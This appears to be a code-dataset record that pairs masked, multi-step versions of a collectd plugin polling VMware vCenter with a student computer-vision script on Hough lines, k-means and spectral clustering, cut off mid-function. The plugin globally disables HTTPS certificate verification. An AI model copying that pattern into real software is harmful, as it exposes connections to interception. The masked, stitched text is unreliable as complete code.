belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-5": "# collectd-vcenter - vcenter.py\n#\n# Author : Loic Lambiel @ exoscale\n# Contributor : Josh VanderLinden\n# Description : This is a collectd python module to gather stats from Vmware\n# vcenter\n\nimport logging\nimport ssl\nimport time\n\nfrom pysphere import VIServer\n\ntry:\n import collectd\n COLLECTD_ENABLED = True\nexcept ImportError:\n COLLECTD_ENABLED = False\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nMB = 1024 ** 2\nHOST_STATUS = ('green', 'gray', 'yellow', 'red')\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None,\n verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n\n stats = {\n 'datastore': {},\n 'datacenter': {},\n }\n\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n\n return stats\n\n def poll_datastore(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datastore.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datastore.\n :param str name:\n Name of the datastore.\n\n :returns:\n A dictionary with four keys: capacity, free, used, and usage. The\n capacity, free, and used space are measured in megabytes while the\n usage is a percentage.\n\n \"\"\"\n\n capacity = free = usage = 0\n\n try:\n self.log.debug('query datastore %s' % (name,))\n props = server._retrieve_properties_traversal(property_names=[\n 'name',\n 'summary.capacity',\n 'summary.freeSpace',\n ], from_node=obj, obj_type='Datastore')\n\n for ps in props:\n for prop in ps.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.capacity':\n capacity = pv / MB\n elif pn == 'summary.freeSpace':\n free = pv / MB\n except:\n self.log.exception('Failed to get datastore metrics')\n\n if capacity > 0:\n usage = (capacity - free) / float(capacity) * 100\n\n return {\n 'capacity': capacity,\n 'free': free,\n 'used': capacity - free,\n 'usage': usage,\n }\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n\n if '.' in name:\n name = name.split('.')[0]\n\n stats = self._poll_group('datacenter', server, obj, name)\n\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n else:\n if 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n\n # change collection behavior based on the type of group we're dealing\n # with\n if group_type == 'datacenter':\n # find each cluster in the datacenter\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n # find each host in the datacenter or cluster\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n\n # initialize some metrics\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n\n # iterate over each child node in this object group\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n\n # aggregate data from each child to the top level\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n\n # recalculate percentages\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n\n # return the current metrics for this group\n group_stats = {\n 'cpu_total': cpu_total,\n 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent,\n 'mem_total': mem_total,\n 'mem_usage': mem_usage,\n 'mem_percent': mem_percent,\n 'vms_total': vms_total,\n 'vms_running': vms_running,\n 'vms_stopped': vms_stopped,\n child_type: child_stats,\n }\n\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n\n self.log.debug('found host: %s' % (name,))\n\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n\n if '.' in name and name.count('.') != 3:\n name = name.split('.')[0]\n\n props = server._retrieve_properties_traversal(property_names=[\n 'name',\n 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize',\n 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz',\n ], from_node=obj, obj_type='HostSystem')\n\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n\n stats = {\n 'status': status,\n 'cpu_total': cpu_total,\n 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent,\n 'cpu_count': cpu_count,\n 'mem_total': mem_total,\n 'mem_usage': mem_usage,\n 'mem_percent': mem_percent,\n 'vms_total': vms_total,\n 'vms_running': vms_running,\n 'vms_stopped': vms_stopped,\n }\n\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n\n self.log.debug('Beginning read callback')\n info = self.poll()\n\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n\n # report information for all vCenter servers\n for vcenter, data in info.items():\n # report datastore information\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n\n # report datacenter information\n for dc_name, dc_data in data['datacenter'].items():\n # extract any cluster and host information for later processing\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n\n # report cluster information\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n\n # report host information\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n\n if COLLECTD_ENABLED:\n self._handler_map = {\n logging.CRITICAL: collectd.error,\n logging.ERROR: collectd.error,\n logging.WARN: collectd.warning,\n logging.INFO: collectd.info,\n logging.DEBUG: collectd.info,\n }\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n\n if record.level == logging.DEBUG and not self.verbose:\n return\n\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\nif COLLECTD_ENABLED:\n instance = CollectdCollector([])\n\n collectd.register_config(instance.configure)\n collectd.register_read(instance.read)\n",
"step-ids": [
11,
13,
19,
20,
24
]
}
|
[
11,
13,
19,
20,
24
] |
import numpy as np
import cv2 as cv
import random
import time
random.seed(0)
def displayImage(winName, img):
""" Helper function to display image
arguments:
winName -- Name of display window
img -- Source Image
"""
cv.imshow(winName, img)
cv.waitKey(0)
##############################################
# Task 1 ##########################
##############################################
def task_1_a():
print("Task 1 (a) ...")
img = cv.imread('../images/shapes.png')
gray_image = cv.cvtColor(img,cv.COLOR_BGR2GRAY)
edges = cv.Canny( gray_image,50,150)
#cv.imshow('edges', edges)
detected_lines = cv.HoughLines(edges,1,np.pi/180,10)
#print (detected_lines)
for rho,theta in detected_lines[0]:
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv.line(img,(x1,y1),(x2,y2),(0,255,0),1)
displayImage('1_a Hough transform - detected lines ', img)
def myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):
"""
Your implementation of HoughLines
:param img_edges: single-channel binary source image (e.g: edges)
:param d_resolution: the resolution for the distance parameter
:param theta_step_sz: the resolution for the angle parameter
:param threshold: minimum number of votes to consider a detection
:return: list of detected lines as (d, theta) pairs and the accumulator
"""
accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(img_edges.shape) / d_resolution)))
detected_lines = []
rho = int(np.linalg.norm(img_edges.shape) / d_resolution)
#print (rho)
theta = int(180 / theta_step_sz)
theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))
#print (theta)
width, height = img_edges.shape
img_edges_copy = img_edges.copy()
detected_lines = []
for x in range(width):
for y in range(height):
if img_edges_copy[x,y]:
for index_theta in range(len(theta_array)):
#theta_value = theta * index_theta
rho_value = x*np.cos(theta_array[index_theta]) + y*np.sin(theta_array[index_theta])
# to avoid negative index
index_rho = int (rho_value + rho/2)
# to avoid index overflow
if (index_rho >= rho) : continue
#print('rhoindex')
#print (index_rho)
accumulator[index_theta, index_rho] += 1
if accumulator[index_theta, index_rho] >= threshold:
detected_lines.append((theta_array[index_theta], rho_value))
return detected_lines, accumulator
def task_1_b():
print("Task 1 (b) ...")
img = cv.imread('../images/shapes.png')
img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale
edges = cv.Canny( img_gray,50,150) # detect the edges
detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)
cv.imshow("1_b Accumulator myHoughLines", accumulator)
#print (len(detected_lines))
for theta,rho in detected_lines:
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv.line(img,(x1,y1),(x2,y2),(0,0,255),2)
displayImage('1_b Hough transform - own implementation', img)
##############################################
# Task 2 ##########################
##############################################
def task_2():
print("Task 2 ...")
img = cv.imread('../images/line.png')
img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale
edges = cv.Canny( img_gray,50,150,apertureSize = 3) # detect the edges
theta_res = 1 # set the resolution of theta
d_res = 1 # set the distance resolution
_, accumulator = myHoughLines(edges, d_res, theta_res, 50)
displayImage("task_2_ accumulator - mean shift", accumulator)
#mean_shift(accumulator)
##############################################
# Task 3 ##########################
##############################################
def myKmeans(data, k, useDist = False):
"""
:return: centers and list of indices that store the cluster index for each data point
"""
centers = np.zeros((k, 1), dtype = int)
index = np.zeros(data.shape[0], dtype=int)
clusters = [[] for i in range(k)]
threshold = 0
if data.shape[1] > 1:
threshold = 20
print('Threshold value = ' + str(threshold))
print('-------------------------------------------------')
# initialize centers using some random points from data
# ....
# Randomly initialize centers with pixel difference of greater than 0
for idx in range(centers.shape[0]):
randIdx = random.choice(range(data.shape[0]))
centers[idx] = randIdx
# Randomly initialize centers of different pixl values. Still buggy
# start_time = time.time()
# indices = np.arange(0,data.shape[0]).tolist()
# for idx in range(centers.shape[0]):
# if len(indices) > 0:
# randIdx = random.choice(indices)
# delIndices = np.unique(np.where((data*255).astype('uint8') == (data[randIdx]*255).astype('uint8'))).tolist()
# if len(delIndices) > 0:
# for i in range(len(delIndices)):
# try:
# indices.remove(delIndices[i])
# except ValueError:
# print('Value not found')
# # print('Indices removed')
# else:
# randIdx = random.choice(range(data.shape[0]))
# centers[idx] = randIdx
# end_time = time.time()
# print('Center no' + str(idx+1) + ' added in ' + str(round(end_time - start_time,5)) + ' seconds')
# To debug uncomment the following lines
# Sometimes the pixel values of two cluster centroids are too close
# Therefore, one of the clusters might end up not having any points at all
# print('Initial centers:\n' + str(centers))
# print('-------------------------------------------------')
# centerVals = data[centers]
# print('Pixel Values of initial centers:\n' + str(centerVals))
# print('-------------------------------------------------')
convergence = False
iterationNo = 0
start_time = time.time()
while not convergence:
# assign each point to the cluster of closest center
# ...
euclDist = 0
centerVals = data[centers]
for idx in range(data.shape[0]):
if useDist:
# Since data is a vector, distance is only the difference
# Normalize the distance to keep it between 0 and 1
euclDist = (centers - idx) / data.shape[0]
cost = np.square(data[idx] - centerVals) + np.square(euclDist)
index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])
clusters[index[idx]].append(idx)
# update clusters' centers and check for convergence
# ...
convCounter = 0
for idx in range(centers.shape[0]):
if (len(clusters[idx]) > 0):
if data.shape[1] == 1:
meanVal = np.mean(data[clusters[idx]])
elif data.shape[1] == 3:
meanVal = np.mean(data[clusters[idx]], axis = 0)
diff = (np.abs(centerVals[idx] - meanVal)*255).astype('uint8')
if (np.sum(diff) > threshold):
# indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])
indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])
if indices.size > 0:
centers[idx] = np.random.choice(indices)
else:
# if no pixel with the mean value is found, choose another pixel in the cluster
# and continue
centers[idx] = np.random.choice(clusters[idx])
else:
convCounter += 1
else:
convCounter += 1
if convCounter == k:
convergence = True
iterationNo += 1
print('iterationNo = ', iterationNo)
print('-------------------------------------------------')
end_time = time.time()
print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time - start_time, 5)) + ' seconds')
print('-------------------------------------------------')
return index, centers
def task_3_a():
print("Task 3 (a) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')
grayImg /= 255
cv.imshow('Intensity Image', grayImg)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
grayVec = np.reshape(grayImg.copy(), (-1,1))
index, centers = myKmeans(grayVec, k)
for kVal in range(k):
indices = np.where(index == kVal)[0]
grayVec[indices] = grayVec[centers[kVal]]
cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.reshape(grayImg.shape))
cv.waitKey(0)
print('=================================================')
def task_3_b():
print("Task 3 (b) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
imgFloat = img.copy().astype('float64')
imgFloat /= 255
cv.imshow('Color Image', imgFloat)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
imgVec = np.reshape(imgFloat.copy(), (-1,3))
index, centers = myKmeans(imgVec, k)
for kVal in range(k):
indices = np.where(index == kVal)[0]
imgVec[indices] = imgVec[centers[kVal]]
cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape(imgFloat.shape))
cv.waitKey(0)
print('=================================================')
def task_3_c():
print("Task 3 (c) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')
grayImg /= 255
cv.imshow('Intensity Image', grayImg)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
grayVec = np.reshape(grayImg.copy(), (-1,1))
index, centers = myKmeans(grayVec, k, useDist = True)
for kVal in range(k):
indices = np.where(index == kVal)[0]
grayVec[indices] = grayVec[centers[kVal]]
cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' + str(k), grayVec.reshape(grayImg.shape))
cv.waitKey(0)
print('=================================================')
##############################################
# Task 4 ##########################
##############################################
def task_4_a():
print("Task 4 (a) ...")
print('-------------------------------------------------')
D = np.zeros((8,8))
W = np.array((
[0, 1, 0.2, 1, 0, 0, 0, 0], # A
[1, 0, 0.1, 0, 1, 0, 0, 0], # B
[0.2, 0.1, 0, 1, 0, 1, 0.3, 0], # C
[1, 0, 1, 0, 0, 1, 0, 0], # D
[0, 1, 0, 0, 0, 0, 1, 1], # E
[0, 0, 1, 1, 0, 0, 1, 0], # F
[0, 0, 0.3, 0, 1, 1, 0, 1], # G
[0, 0, 0, 0, 1, 0, 1, 0] # H
)) # construct the W matrix
for i in range(W.shape[0]):
D[i,i] = np.sum(W[i,:]) # construct the D matrix
'''
...
your code ...
...
'''
invSqrtD = np.linalg.inv(np.sqrt(D))
L = D - W
op = np.matmul(np.matmul(invSqrtD,L),invSqrtD)
_, _, eigenVecs = cv.eigen(op)
secMinEigenVec = eigenVecs[eigenVecs.shape[1]-2, :]
C1 = 0
C2 = 0
for i in range(secMinEigenVec.shape[0]):
if secMinEigenVec[i] < 0:
C1 += D[i,i]
else:
C2 += D[i,i]
print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))
# Figure in pdf
minNormCut = (1/C1 + 1/C2) * 2.4
print('Min Norm Cut = ' + str(minNormCut))
print('=================================================')
##############################################
##############################################
##############################################
# task_1_a()
# task_1_b()
# task_2()
# task_3_a()
# cv.destroyAllWindows()
# task_3_b()
# cv.destroyAllWindows()
# task_3_c()
# cv.destroyAllWindows()
task_4_a()
|
normal
|
{
"blob_id": "f7886f8d98ad0519f4635064f768f25dad101a3d",
"index": 2612,
"step-1": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\n<mask token>\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\n<mask token>\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n 